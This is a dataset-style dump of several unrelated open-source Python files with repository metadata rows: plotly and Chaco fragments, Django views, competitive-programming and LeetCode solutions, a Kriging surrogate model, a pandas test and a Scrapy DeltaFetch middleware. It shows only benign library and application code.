        super(TicklabelstepValidator, self).__init__(
            plotly_name=plotly_name,
            parent_name=parent_name,
            edit_type=kwargs.pop("edit_type", "colorbars"),
            min=kwargs.pop("min", 1),
            **kwargs,
        )
| [
"nicolas@plot.ly"
] | nicolas@plot.ly |
d5ab8cba4a8c372c31f9f94079edb50e6fae9033 | 0ccd29f678d3b88832eac8b6b577cb32ee1c0653 | /chaco/chaco_traits.py | 8b1ae8d2cc554ef3eb42d64b3d1c8efe49ef7629 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-public-domain"
] | permissive | martinRenou/chaco | 7f0bc36619268f024bc5ea1e62178d5ef77f4b6e | 1888da3ecee89f9b2d11900cda9333b32fc5e89a | refs/heads/master | 2020-07-21T03:40:17.652867 | 2019-09-01T12:12:04 | 2019-09-01T12:12:04 | 206,750,733 | 0 | 0 | NOASSERTION | 2019-09-06T08:36:50 | 2019-09-06T08:36:50 | null | UTF-8 | Python | false | false | 796 | py | """ Defines various traits that are used in many places in Chaco.
"""
# Enthought library imports
from traits.api import Enum
#----------------------------------------------------------------------------
# Box positioning traits: used to specify positions of boxes relative to
# one another. Generally used for layout.
#----------------------------------------------------------------------------
# Which edge of a box an item attaches to.
box_edge_enum = Enum("left", "right", "top", "bottom")
# Values correspond to: top, bottom, left, right, top left, top right, bottom
# left, bottom right
box_position_enum = Enum("T", "B", "L", "R", "TL", "TR", "BL", "BR")
# For backwards compatibility, import LineStyle & LineStyleEditor from enable.
# (They used to be defined here.)
from enable.api import LineStyle, LineStyleEditor
# EOF
| [
"ischnell@enthought.com"
] | ischnell@enthought.com |
201ccbd6e28d692a9e14c5f2478ed25401e276b1 | 08e052c0c2ee4ad0cd4980fbc8a692c407118659 | /venv/bin/chardetect | e40b7008dff3ce3f22024dfecbd68230af3a2b76 | [] | no_license | miltonleal/MAC0110_Introduction_Computer_Science_IME_USP | 6fad182f7fbb3e83403080800074bf57456cb0b5 | b47936ce66e715dba79dff44779a750d795192a0 | refs/heads/master | 2023-03-04T11:06:48.092980 | 2021-02-17T14:47:46 | 2021-02-17T14:47:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 259 | #!/Users/admin/PycharmProjects/MAC110/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from chardet.cli.chardetect import main
if __name__ == '__main__':
    # Strip setuptools' '-script.py(w)'/'.exe' wrapper suffixes from
    # argv[0] so chardetect's usage/help shows the clean command name.
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(main())
| [
"milton.leal@usp.br"
] | milton.leal@usp.br | |
6b977a8c07dfe5e184c2f3e20aa3b4c488859dfe | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03838/s376717183.py | 4bdb937150e0dcdff3a481bbfa20fc4825cb3304 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 962 | py | import sys, re
from collections import deque, defaultdict, Counter
from math import ceil, sqrt, hypot, factorial, pi, sin, cos, radians
from itertools import accumulate, permutations, combinations, product
from operator import itemgetter, mul
from copy import deepcopy
from string import ascii_lowercase, ascii_uppercase, digits
from bisect import bisect, bisect_left
from fractions import gcd
from heapq import heappush, heappop
from functools import reduce
# Competitive-programming input helpers.
# NOTE: `input` deliberately shadows the builtin to read a stripped line
# from stdin; the other helpers build on it.
def input(): return sys.stdin.readline().strip()
def INT(): return int(input())
def MAP(): return map(int, input().split())
def LIST(): return list(map(int, input().split()))
def ZIP(n): return zip(*(MAP() for _ in range(n)))
sys.setrecursionlimit(10 ** 9)
INF = float('inf')  # template constant, unused here
mod = 10 ** 9 + 7  # template constant, unused here
# NOTE(review): the casework below matches the "turn x into y using +1
# and sign-flip operations, minimizing operation count" problem --
# confirm against the original task statement.
x, y = MAP()
if x*y < 0:
    # Opposite signs: one flip plus the magnitude difference.
    print(1+abs(abs(x)-abs(y)))
elif x == 0 or y == 0:
    if x < y:
        print(max(abs(x), abs(y)))
    else:
        # Going "down" through zero costs one extra flip.
        print(1+max(abs(x), abs(y)))
else:
    if y > x:
        # Same sign, increasing: just increment.
        print(y-x)
    else:
        # Same sign, decreasing: flip, step up, flip back (2 extra ops).
        print(2+x-y)
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
84cd6d0ec245d8c1be7c030aafca4fa7e34c996e | ea8f71a9a609f15f42bff595bb467722791244a7 | /todo/views.py | 7f489b3f455874f44a52039e8b726be1db9ae581 | [] | no_license | Roderich25/pythonanywhereapp | aafe600cd33c69347655b685f4b792038196aede | 1bd46136e316ea175441ce14a722ddf5b266f767 | refs/heads/master | 2023-05-11T09:37:11.888269 | 2019-10-21T13:24:00 | 2019-10-21T13:24:00 | 216,573,629 | 0 | 0 | null | 2023-04-21T20:39:16 | 2019-10-21T13:21:21 | Python | UTF-8 | Python | false | false | 1,017 | py | from django.shortcuts import render, redirect
from .models import Todo
from .forms import TodoForm, NewTodoForm
from django.views.decorators.http import require_POST
def index(request):
    """Render the todo list page, newest items first, with an empty add-form."""
    items = Todo.objects.order_by('-id')
    return render(
        request,
        'todo/index.html',
        context={"todo_list": items, "form": NewTodoForm()},
    )
@require_POST
def add_todo(request):
    """Create a todo from the POSTed form data; invalid input is ignored."""
    submitted = NewTodoForm(request.POST)
    if submitted.is_valid():
        submitted.save()
    return redirect('index')
def todo_completed(request, todo_id):
    """Mark the todo identified by ``todo_id`` as completed."""
    item = Todo.objects.get(pk=todo_id)
    item.completed = True
    item.save()
    return redirect('index')
def delete_completed(request):
    # Bulk-delete every todo already marked completed, then return to the list.
    Todo.objects.filter(completed=True).delete()
    return redirect('index')
def delete_all(request):
    # Bulk-delete every todo regardless of state, then return to the list.
    Todo.objects.all().delete()
    return redirect('index')
| [
"rodrigoavilasolis@gmail.com"
] | rodrigoavilasolis@gmail.com |
80bb4b70c97cfbda2f8175dc88f4e6e29922de08 | d2c4934325f5ddd567963e7bd2bdc0673f92bc40 | /tests/model_control/detailed/transf_Quantization/model_control_one_enabled_Quantization_PolyTrend_Seasonal_DayOfMonth_LSTM.py | bae3999426ca9e05b0f4c9111fc8851a700d1b80 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | jmabry/pyaf | 797acdd585842474ff4ae1d9db5606877252d9b8 | afbc15a851a2445a7824bf255af612dc429265af | refs/heads/master | 2020-03-20T02:14:12.597970 | 2018-12-17T22:08:11 | 2018-12-17T22:08:11 | 137,104,552 | 0 | 0 | BSD-3-Clause | 2018-12-17T22:08:12 | 2018-06-12T17:15:43 | Python | UTF-8 | Python | false | false | 171 | py | import pyaf.tests.model_control.test_ozone_custom_models_enabled as testmod
testmod.build_model( ['Quantization'] , ['PolyTrend'] , ['Seasonal_DayOfMonth'] , ['LSTM'] ); | [
"antoine.carme@laposte.net"
] | antoine.carme@laposte.net |
28c9709a759eca89ba9fd8190f371c4e58acd657 | bfa51f4adc2e2a84c98b3bd02e446a1d8a2fd663 | /mtrack/views/facility_locations.py | f3f827bf39313783eb50cfe58c0a4a8320177745 | [] | no_license | unicefuganda/rapidsms-mtrack | a47f7b1a89240fb1c9145bc4dcbb950f1e35df95 | a03cc6cf46a73620e0eb1bc3fe67816d9029f2d6 | refs/heads/master | 2021-05-16T02:25:01.278824 | 2019-07-10T18:42:22 | 2019-07-10T18:42:22 | 2,011,844 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,895 | py | import datetime
from django.template import RequestContext
from django.shortcuts import redirect, get_object_or_404, render_to_response
from rapidsms.contrib.locations.models import Location
from healthmodels.models.HealthFacility import HealthFacility
from rapidsms_httprouter.models import Message
from django.http import HttpResponse
from django.utils import simplejson
from django.conf import settings
def facility_cas(request):
    """Render the facility/catchment-area lookup page.

    The district drop-down is populated from all district-type locations;
    the facility drop-down starts with a placeholder entry and is filled
    in client-side through `ajax_portal2` once a district is chosen.
    """
    # Removed: an unused `locs` queryset (which forced a pointless DB
    # query) and a dead `if request.method == 'POST': pass` branch.
    districts = Location.objects.filter(type__name='district').values('id', 'name').order_by('name')
    facilities = [(0, 'Select Facility')]
    return render_to_response('mtrack/facility_locations.html', {'districts': districts,
                                                                 'facilities': facilities,
                                                                 },
                              context_instance=RequestContext(request))
def ajax_portal2(request):
    """AJAX endpoint: given xtype/xid query params, return JSON.

    xtype == 'district': facilities whose catchment areas fall inside the
    district subtree; xtype == 'facility': the facility's catchment
    areas; anything else: an empty list.
    """
    xtype = request.GET.get('xtype', '')
    xid = request.GET.get('xid', '')
    if xtype == 'district':
        # include_self=True so facilities attached directly to the
        # district location itself are matched too.
        district_locs = Location.objects.get(pk=xid).get_descendants(include_self=True)
        facilities = list(HealthFacility.objects.filter(catchment_areas__in=district_locs).\
            values('id', 'name', 'type__slug').order_by('name').distinct())
        response = facilities
    elif xtype == 'facility':
        response = list(HealthFacility.objects.get(pk=xid).catchment_areas.all().values('name','type'))
    else:
        response = []
    # NOTE(review): `json` shadows the stdlib module name, and `mimetype`
    # is the pre-Django-1.7 spelling of `content_type` -- kept as-is for
    # this codebase's Django version; confirm before upgrading.
    json = simplejson.dumps(response)
    return HttpResponse(json, mimetype='application/json')
| [
"sekiskylink@gmail.com"
] | sekiskylink@gmail.com |
357f0f3acd183afa00d04846c89e4cf6dc948676 | e94c3e02b390b7c37214218083e4c5b2ad622f60 | /算法与数据结构/LeetCode/动态规划(DP)/968.监控二叉树.py | 530702ab36f40a07726d0e3b8f30b2727950cbd3 | [
"MIT"
] | permissive | nomore-ly/Job | 1160e341d9c78c2f99846995893f0289f4e56cf6 | ff4fd24447e30e2d17f15696842e214fba7ad61b | refs/heads/master | 2023-06-21T00:23:47.594204 | 2021-07-23T07:29:47 | 2021-07-23T07:29:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 725 | py | #
# @lc app=leetcode.cn id=968 lang=python3
#
# [968] 监控二叉树
#
# @lc code=start
# Definition for a binary tree node.
class TreeNode:
    """A binary-tree node holding a value and two child links."""
    def __init__(self, x):
        """Store the payload and start with no children."""
        self.val = x
        self.left = self.right = None
class Solution:
    def minCameraCover(self, root: "TreeNode") -> int:
        """Return the minimum number of cameras needed to monitor every
        node of the binary tree rooted at ``root``.

        Tree DP: ``dfs`` returns a triple ``[a, b, c]`` for each subtree:
          a - min cameras with a camera placed on this node,
          b - min cameras with the subtree fully covered (camera here
              optional),
          c - min cameras with both child subtrees covered while this
              node may stay uncovered (its parent will cover it).
        The answer for the whole tree is ``b`` at the root.

        Fix: the inner ``dfs`` annotations referenced ``List``, which is
        never imported in this file, raising NameError the first time the
        method ran; the outer ``TreeNode`` annotation is stringified so
        it is not evaluated eagerly either.
        """
        def dfs(node):
            if not node:
                # Empty subtree: placing a camera is impossible (inf);
                # it is already covered at zero cost.
                return [float("inf"), 0, 0]
            la, lb, lc = dfs(node.left)
            ra, rb, rc = dfs(node.right)
            a = lc + rc + 1
            b = min(a, la + rb, ra + lb)
            c = min(a, lb + rb)
            return [a, b, c]
        a, b, c = dfs(root)
        return b
# @lc code=end
| [
"xiaoqi25478@foxmail.com"
] | xiaoqi25478@foxmail.com |
2c8e6d3328b1b0201a0de2960ec5aa1b14674ed3 | 3db1c06cd10d4a72c3e778006364d5a83d1c5e2c | /subisuhostcheck/djangomonitoring/kitsune/management/commands/kitsune_run_job.py | 4362fb85945fc4d9a3c90dc6185ecf600ab9a68d | [] | no_license | shaktijeet-ego/hostdown | 14f07d309c0346ea0a67d321d774a788d2a1b75e | 9eab7ff08746c0c276bdc46bd1f52d2f02d7d2bb | refs/heads/master | 2023-04-05T19:22:57.064463 | 2021-04-28T03:35:34 | 2021-04-28T03:35:34 | 353,187,372 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 780 | py | import sys
from django.core.management import call_command
from django.core.management.base import BaseCommand
from kitsune.models import Job, Log
class Command(BaseCommand):
    """Management command that runs a single kitsune Job by primary key."""
    help = 'Runs a specific job. The job will only run if it is not currently running.'
    args = "job.id"
    def handle(self, *args, **options):
        """Look up the Job named by the first positional argument and run it."""
        if not args:
            sys.stderr.write("This command requires a single argument: a job id to run.\n")
            return
        job_id = args[0]
        try:
            job = Job.objects.get(pk=job_id)
        except Job.DoesNotExist:
            sys.stderr.write("The requested Job does not exist.\n")
            return
        # Block until the job has finished executing.
        job.handle_run()
| [
"shaktijeet.tripathi@gmail.com"
] | shaktijeet.tripathi@gmail.com |
b8a39e4b237775fa112b8b08084ab7469ea8f0e7 | a9e051485379fb7e569a7c8458045e9eb56d4cf8 | /surrogate/estimator/kriging.py | 357dcc5bdc81b8748f80326eee090c87827710c9 | [
"Apache-2.0",
"MIT"
] | permissive | liujiamingustc/phd | 7634056500c481d39fa036bf0ed744c1d13b0035 | 4f815a738abad43531d02ac66f5bd0d9a1def52a | refs/heads/master | 2020-05-17T07:02:56.000146 | 2019-04-24T15:04:19 | 2019-04-24T15:04:19 | 183,567,207 | 4 | 0 | null | 2019-04-26T06:04:37 | 2019-04-26T06:04:37 | null | UTF-8 | Python | false | false | 6,594 | py | # Copyright 2016 Quan Pan
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Author: Quan Pan <quanpan302@hotmail.com>
# License: Apache License, Version 2.0
# Create: 2016-12-02
""" Surrogate model based on Kriging. """
from math import log
from surrogate.base import SurrogateModel
# pylint: disable-msg=E0611,F0401
from numpy import zeros, dot, ones, eye, abs, exp, log10, diagonal, \
prod, square, column_stack, ndarray, sqrt, inf, einsum, sum, power
from numpy.linalg import slogdet, linalg
from numpy.dual import lstsq
from scipy.linalg import cho_factor, cho_solve
from scipy.optimize import minimize
class KrigingSurrogate(SurrogateModel):
    """Surrogate Modeling method based on the simple Kriging interpolation.
    Predictions are returned as a tuple of mean and RMSE
    """
    def __init__(self):
        super(KrigingSurrogate, self).__init__()
        self.m = 0  # number of independent
        self.n = 0  # number of training points
        self.thetas = zeros(0)  # log10 correlation widths, one per input dimension
        self.nugget = 0  # nugget smoothing parameter from [Sasena, 2002]
        self.R = zeros(0)  # correlation matrix of the training points
        self.R_fact = None  # Cholesky factorization of R (None -> use lstsq path)
        self.R_solve_ymu = zeros(0)  # R^-1 (Y - mu)
        self.R_solve_one = zeros(0)  # R^-1 1
        self.mu = zeros(0)  # estimated process mean
        self.log_likelihood = inf
        # Training Values
        self.X = zeros(0)
        self.Y = zeros(0)
    def fit(self, x, y):
        """Train the surrogate model with the given set of inputs and outputs.

        Maximizes the concentrated log-likelihood over the correlation
        parameters (searched in log10 space with COBYLA, each dimension
        bounded to [log10(1e-2), log10(3)]).

        :param x: Training input locations
        :param y: Model responses at given inputs.
        :raises ValueError: with fewer than 2 training points.
        """
        super(KrigingSurrogate, self).fit(x, y)
        self.m = len(x[0])
        self.n = len(x)
        if self.n <= 1:
            raise ValueError(
                'KrigingSurrogate require at least 2 training points.'
            )
        self.X = x
        self.Y = y
        def _calcll(thetas):
            # Objective callback: minimize the negative log-likelihood.
            self.thetas = thetas
            self._calculate_log_likelihood()
            return -self.log_likelihood
        cons = []
        for i in xrange(self.m):
            # BUG FIX: the original lambdas closed over the loop variable
            # `i` late-bindingly, so every constraint evaluated only the
            # last dimension, leaving the other thetas unbounded.
            # Binding `i=i` as a default argument freezes the current
            # value, giving one min/max bound per dimension.
            cons.append({'type': 'ineq', 'fun': lambda logt, i=i: logt[i] - log10(1e-2)})  # min
            cons.append({'type': 'ineq', 'fun': lambda logt, i=i: log10(3) - logt[i]})  # max
        self.thetas = minimize(_calcll, zeros(self.m), method='COBYLA',
                               constraints=cons, tol=1e-8).x
        self._calculate_log_likelihood()
    def _calculate_log_likelihood(self):
        """Calculates the log-likelihood (up to a constant) for a given
        self.theta.
        """
        R = zeros((self.n, self.n))
        X, Y = self.X, self.Y
        thetas = power(10., self.thetas)
        # exponentially weighted distance formula (upper triangle only;
        # symmetrized below)
        for i in xrange(self.n):
            R[i, i + 1:self.n] = exp(-thetas.dot(square(X[i, ...] - X[i + 1:self.n, ...]).T))
        R *= (1.0 - self.nugget)
        R += R.T + eye(self.n)
        self.R = R
        one = ones(self.n)
        rhs = column_stack([Y, one])
        try:
            # Cholesky Decomposition
            self.R_fact = cho_factor(R)
            sol = cho_solve(self.R_fact, rhs)
            solve = lambda x: cho_solve(self.R_fact, x)
            det_factor = log(abs(prod(diagonal(self.R_fact[0])) ** 2) + 1.e-16)
        except (linalg.LinAlgError, ValueError):
            # Since Cholesky failed, try linear least squares
            self.R_fact = None  # reset this to none, so we know not to use Cholesky
            sol = lstsq(self.R, rhs)[0]
            solve = lambda x: lstsq(self.R, x)[0]
            det_factor = slogdet(self.R)[1]
        self.mu = dot(one, sol[:, :-1]) / dot(one, sol[:, -1])
        y_minus_mu = Y - self.mu
        self.R_solve_ymu = solve(y_minus_mu)
        self.R_solve_one = sol[:, -1]
        self.sig2 = dot(y_minus_mu.T, self.R_solve_ymu) / self.n
        if isinstance(self.sig2, ndarray):
            self.log_likelihood = -self.n / 2. * slogdet(self.sig2)[1] \
                                  - 1. / 2. * det_factor
        else:
            self.log_likelihood = -self.n / 2. * log(self.sig2) \
                                  - 1. / 2. * det_factor
    def predict(self, x):
        """Calculates a predicted value of the response based on the current
        trained model for the supplied list of inputs.

        Returns a (mean, rmse) tuple.

        :param x: Point at which the surrogate is evaluated.
        """
        super(KrigingSurrogate, self).predict(x)
        X, Y = self.X, self.Y
        thetas = power(10., self.thetas)
        r = exp(-thetas.dot(square((x - X).T)))
        if self.R_fact is not None:
            # Cholesky Decomposition
            sol = cho_solve(self.R_fact, r).T
        else:
            # Linear Least Squares
            sol = lstsq(self.R, r)[0].T
        f = self.mu + dot(r, self.R_solve_ymu)
        term1 = dot(r, sol)
        # Note: sum(sol) should be 1, since Kriging is an unbiased
        # estimator. This measures the effect of numerical instabilities.
        bias = (1.0 - sum(sol)) ** 2. / sum(self.R_solve_one)
        mse = self.sig2 * (1.0 - term1 + bias)
        rmse = sqrt(abs(mse))
        return f, rmse
    def linearize(self, x):
        """Calculates the jacobian of the Kriging surface at the requested point.
        :param x: Point at which the surrogate Jacobian is evaluated.
        """
        thetas = power(10., self.thetas)
        r = exp(-thetas.dot(square((x - self.X).T)))
        # Z = einsum('i,ij->ij', X, Y) is equivalent to, but much faster and
        # memory efficient than, diag(X).dot(Y) for vector X and 2D array Y.
        # I.e. Z[i,j] = X[i]*Y[i,j]
        gradr = r * -2 * einsum('i,ij->ij', thetas, (x - self.X).T)
        jac = gradr.dot(self.R_solve_ymu).T
        return jac
class FloatKrigingSurrogate(KrigingSurrogate):
    """Kriging surrogate whose predictions are plain floats: only the
    mean of the parent model's (mean, rmse) prediction is returned.
    """
    def predict(self, x):
        """Return just the predicted mean at *x*, discarding the RMSE."""
        mean, _rmse = super(FloatKrigingSurrogate, self).predict(x)
        return mean
| [
"quanpan302@hotmail.com"
] | quanpan302@hotmail.com |
3f3958a62d181d094a638a1d21990e621e83aee4 | 16e266cf50a712ed29a4097e34504aac0281e6cb | /Functions/venv/lib/python3.6/site-packages/_TFL/IV_Number.py | 727c60959a0c90ead1b7c1e10a1327d21cb2e807 | [
"BSD-3-Clause"
] | permissive | felix-ogutu/PYTHON-PROJECTS | 9dd4fdcfff6957830587b64c5da3b5c3ade3a27e | 8c1297dbda495078509d06a46f47dc7ee60b6d4e | refs/heads/master | 2023-06-05T04:41:36.727376 | 2021-06-25T20:36:52 | 2021-06-25T20:36:52 | 380,348,911 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,642 | py | # -*- coding: utf-8 -*-
# Copyright (C) 1999-2015 Mag. Christian Tanzer. All rights reserved
# Glasauergasse 32, A--1130 Wien, Austria. tanzer@swing.co.at
# ****************************************************************************
#
# This module is licensed under the terms of the BSD 3-Clause License
# <http://www.c-tanzer.at/license/bsd_3c.html>.
# ****************************************************************************
#
#++
# Name
# TFL.IV_Number
#
# Purpose
# Model Interface-Version Number
#
# Revision Dates
# 25-Oct-1999 (CT) Creation
# 2-Nov-1999 (CT) Comment added
# 15-Nov-1999 (CT) `db_extension` added
# 18-Nov-1999 (CT) `producer` added
# 19-Nov-1999 (CT) `producer` convert to list
# 19-Nov-1999 (CT) `consumer` added
# 8-Aug-2000 (MG) Format of `__repr__` changed
# 9-Aug-2000 (CT) `clone` added
# 9-Aug-2000 (MG) `_unnested` added and used in `__repr__`
# 28-Sep-2000 (CT) s/database/data base/g
# 13-Dec-2000 (CT) s/data base/database/g
# 12-Apr-2002 (CT) Use `StandardError` instead of `Exception`
# 15-Apr-2002 (CT) Raise `TypeError` instead of string exception
# (__setattr__)
# 24-Oct-2002 (CT) Esthetics
# 28-Sep-2004 (CT) Use `isinstance` instead of type comparison
# 14-Feb-2006 (CT) Moved into package `TFL`
# 9-Aug-2006 (CT) `__hash__` changed to return `hash (id (self))`
# instead of `id (self)`
# ««revision-date»»···
#--
from _TFL import TFL
from _TFL.pyk import pyk
class Interface_Mismatch(Exception):
    """Raised when an `external_version` falls outside an `IV_Number`'s
    compatibility interval (`comp_min`, `comp_max`).
    """
class IV_Number :
    """Model Interface-Version Number.
    An `IV_Number` describes the version of a specific interface of a
    software product (e.g., a database read or written).
    `external_version` is set to the version of the interface when the
    program reads information from that interface. The value of
    `external_version` can be used to convert from an old to a new format.
    `external_version` applies only to two-way interfaces which are
    read and written by the same program.
    `external_version` must lie in the interval (`comp_min`, `comp_max`).
    If it is set to a value not in that interval, an exception is raised.
    The function `compatible` can be used to check the `external_version`
    before setting it.
    """
    def __init__ \
        ( self, name, producer, consumer, program_version
        , comp_min = None
        , comp_max = None
        , db_extension = None
        ) :
        # A single producer/consumer given as a plain string is
        # normalized to a 1-tuple so both are always sequences.
        if isinstance (producer, pyk.string_types) :
            producer = (producer, )
        if isinstance (consumer, pyk.string_types) :
            consumer = (consumer, )
        self.name = name
        self.producer = producer
        self.consumer = consumer
        self.program_version = program_version
        # `(a, b) [cond]` selects `b` when `cond` is true: the
        # compatibility bounds default to `program_version` itself.
        self.comp_min = (comp_min, program_version) [comp_min is None]
        self.comp_max = (comp_max, program_version) [comp_max is None]
        self.db_extension = db_extension
        self.reset_external_version ()
    # end def __init__
    def clone (self, comp_min) :
        """Returns a clone of `self` with changed `comp_min`."""
        return self.__class__ \
            ( self.name
            , self.producer
            , self.consumer
            , self.program_version
            , comp_min
            , self.comp_max
            , self.db_extension
            )
    # end def clone
    def compatible (self, external_version) :
        # True iff `external_version` lies in the closed interval
        # [comp_min, comp_max].
        return self.comp_min <= external_version <= self.comp_max
    # end def compatible
    def restrict (self, comp_min, comp_max) :
        """Restrict compatibility interval to `comp_min` and `comp_max`."""
        # Written through `__dict__` to bypass the write-once guard in
        # `__setattr__`.
        self.__dict__ ["comp_min"] = max (self.comp_min, comp_min)
        self.__dict__ ["comp_max"] = min (self.comp_max, comp_max)
    # end def restrict
    def reset_external_version (self) :
        """Reset `self.external_version`."""
        # -1 marks "not yet read"; stored via `__dict__` to skip the
        # compatibility check in `__setattr__`.
        self.__dict__ ["external_version"] = -1
    # end def reset_external_version
    def __setattr__ (self, name, value) :
        """Prevent the changing of attributes other than `external_version`.
        `external_version` is checked for compatibility with `comp_min`
        and `comp_max`.
        Once an attribute is set, it cannot be changed to another value.
        """
        if hasattr (self, name) and name != "external_version" :
            raise TypeError \
                ( "Attribute %s is readonly. Cannot change value from %s to %s"
                % (name, getattr (self, name), value)
                )
        self.__dict__ [name] = value
        if name == "external_version" :
            # Raises Interface_Mismatch for out-of-range values (note:
            # the value has already been stored at this point).
            if not self.compatible (value) :
                raise Interface_Mismatch (self)
    # end def __setattr__
    def __str__ (self) :
        return "%s = %s" % (self.name, self.program_version)
    # end def __str__
    def _unnested (self, l) :
        # Collapse a 1-element sequence to its single item (for a
        # tidier repr).
        if len (l) == 1 :
            return l [0]
        else :
            return l
    # end def _unnested
    def __repr__ (self) :
        return "%s ('%s', %s, %s, %s, %s, %s, '%s')" % \
               ( self.__class__.__name__, self.name
               , repr (self._unnested (self.producer))
               , repr (self._unnested (self.consumer))
               , self.program_version, self.comp_min, self.comp_max
               , self.db_extension or ""
               )
    # end def __repr__
# end class IV_Number
if __name__ != "__main__" :
TFL._Export ("*")
### __END__ TFL.IV_Number
| [
"you@example.com"
] | you@example.com |
93138bc3c1cbcdd2bc2cd63d9d87a7507f988c15 | f07a42f652f46106dee4749277d41c302e2b7406 | /Data Set/bug-fixing-5/4ef793f2658bd7c8752e604548e55c2bcdd82d7b-<test_constructor_from_items>-fix.py | 338f47c225316ff2ab0d0bf23e89689e8cc87cbd | [] | no_license | wsgan001/PyFPattern | e0fe06341cc5d51b3ad0fe29b84098d140ed54d1 | cc347e32745f99c0cd95e79a18ddacc4574d7faa | refs/heads/main | 2023-08-25T23:48:26.112133 | 2021-10-23T14:11:22 | 2021-10-23T14:11:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,948 | py | def test_constructor_from_items(self, float_frame, float_string_frame):
items = [(c, float_frame[c]) for c in float_frame.columns]
with tm.assert_produces_warning(FutureWarning, check_stacklevel=False):
recons = DataFrame.from_items(items)
tm.assert_frame_equal(recons, float_frame)
with tm.assert_produces_warning(FutureWarning, check_stacklevel=False):
recons = DataFrame.from_items(items, columns=['C', 'B', 'A'])
tm.assert_frame_equal(recons, float_frame.loc[:, ['C', 'B', 'A']])
row_items = [(idx, float_string_frame.xs(idx)) for idx in float_string_frame.index]
with tm.assert_produces_warning(FutureWarning, check_stacklevel=False):
recons = DataFrame.from_items(row_items, columns=float_string_frame.columns, orient='index')
tm.assert_frame_equal(recons, float_string_frame)
assert (recons['A'].dtype == np.float64)
msg = "Must pass columns with orient='index'"
with pytest.raises(TypeError, match=msg):
with tm.assert_produces_warning(FutureWarning, check_stacklevel=False):
DataFrame.from_items(row_items, orient='index')
arr = construct_1d_object_array_from_listlike(([('bar', 'baz')] * len(float_string_frame)))
float_string_frame['foo'] = arr
row_items = [(idx, list(float_string_frame.xs(idx))) for idx in float_string_frame.index]
with tm.assert_produces_warning(FutureWarning, check_stacklevel=False):
recons = DataFrame.from_items(row_items, columns=float_string_frame.columns, orient='index')
tm.assert_frame_equal(recons, float_string_frame)
assert isinstance(recons['foo'][0], tuple)
with tm.assert_produces_warning(FutureWarning, check_stacklevel=False):
rs = DataFrame.from_items([('A', [1, 2, 3]), ('B', [4, 5, 6])], orient='index', columns=['one', 'two', 'three'])
xp = DataFrame([[1, 2, 3], [4, 5, 6]], index=['A', 'B'], columns=['one', 'two', 'three'])
tm.assert_frame_equal(rs, xp) | [
"dg1732004@smail.nju.edu.cn"
] | dg1732004@smail.nju.edu.cn |
19ed14adeb53df54f976ec502b271381df4d55ff | 7dd7b9a1dfd9d8c6ea08e1386737ba9a5c1b4163 | /ordasambond/ordasambond/middlewares/deltafetch.py | c7e77a34393e69669ecde39cdbfdf352956b8cfd | [] | no_license | gogn-in/ordasambond | f07c402c9af0915841e8dfb4bb6b9250e90480cb | ca5f2895a36156a1e9b8f9f28fe6c8f3f9f8b435 | refs/heads/master | 2021-01-10T10:50:48.072071 | 2016-03-22T22:58:22 | 2016-03-22T22:58:22 | 54,489,216 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,149 | py | import os
import time
from scrapy.http import Request
from scrapy.item import BaseItem
from scrapy.utils.request import request_fingerprint
from scrapy.utils.project import data_path
from scrapy.exceptions import NotConfigured
from scrapy import signals
import logging
logger = logging.getLogger(__name__)
# Custom version of the DeltaFetch middleware from scrapylib:
# https://github.com/scrapinghub/scrapylib
# Custom in the fact that the latest version of scrapy has deprecated
# scrapy.log. This version uses python logging.
class DeltaFetch(object):
"""This is a spider middleware to ignore requests to pages containing items
seen in previous crawls of the same spider, thus producing a "delta crawl"
containing only new items.
This also speeds up the crawl, by reducing the number of requests that need
to be crawled, and processed (typically, item requests are the most cpu
intensive).
Supported settings:
* DELTAFETCH_ENABLED - to enable (or disable) this extension
* DELTAFETCH_DIR - directory where to store state
* DELTAFETCH_RESET - reset the state, clearing out all seen requests
Supported spider arguments:
* deltafetch_reset - same effect as DELTAFETCH_RESET setting
Supported request meta keys:
* deltafetch_key - used to define the lookup key for that request. by
default it's the fingerprint, but it can be changed to contain an item
id, for example. This requires support from the spider, but makes the
extension more efficient for sites that many URLs for the same item.
"""
def __init__(self, dir, reset=False):
dbmodule = None
try:
dbmodule = __import__('bsddb3').db
except ImportError:
try:
dbmodule = __import__('bsddb').db
except ImportError:
pass
if not dbmodule:
raise NotConfigured('bssdb or bsddb3 is required')
self.dbmodule = dbmodule
self.dir = dir
self.reset = reset
self.logger = logging.getLogger(__name__)
@classmethod
def from_crawler(cls, crawler):
s = crawler.settings
if not s.getbool('DELTAFETCH_ENABLED'):
raise NotConfigured
dir = data_path(s.get('DELTAFETCH_DIR', 'deltafetch'))
reset = s.getbool('DELTAFETCH_RESET')
o = cls(dir, reset)
crawler.signals.connect(o.spider_opened, signal=signals.spider_opened)
crawler.signals.connect(o.spider_closed, signal=signals.spider_closed)
return o
def spider_opened(self, spider):
if not os.path.exists(self.dir):
os.makedirs(self.dir)
